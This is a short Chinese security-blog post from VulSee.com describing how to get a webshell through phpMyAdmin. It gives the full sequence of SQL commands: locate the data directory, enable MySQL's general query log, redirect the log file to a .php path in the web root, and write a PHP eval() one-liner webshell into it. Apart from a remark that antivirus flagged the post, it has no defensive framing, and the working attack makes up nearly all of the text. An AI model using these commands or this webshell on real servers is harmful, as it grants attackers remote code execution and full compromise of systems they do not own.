微慑信息网

phpmyadmin日志getshell测试

1、登录phpmyadmin

2、查看数据路径,作为猜web路径辅助

select @@datadir;

3、查看日志功能是否开启:

(一般这个日志记录是默认关闭的,需要我们手动开启)

show variables like '%general%';

4、开启日志功能:

SET GLOBAL general_log='on';

5、修改日志路径:

set global general_log_file='D:\\phpStudy\\WWW\\shell.php';

6、执行包含shell的语句即可:

select "<?php eval($_POST['gg']);?>";

 

7、查看结果:

8、ps:发布文章火绒提示webshell….

 

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » phpmyadmin日志getshell测试

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册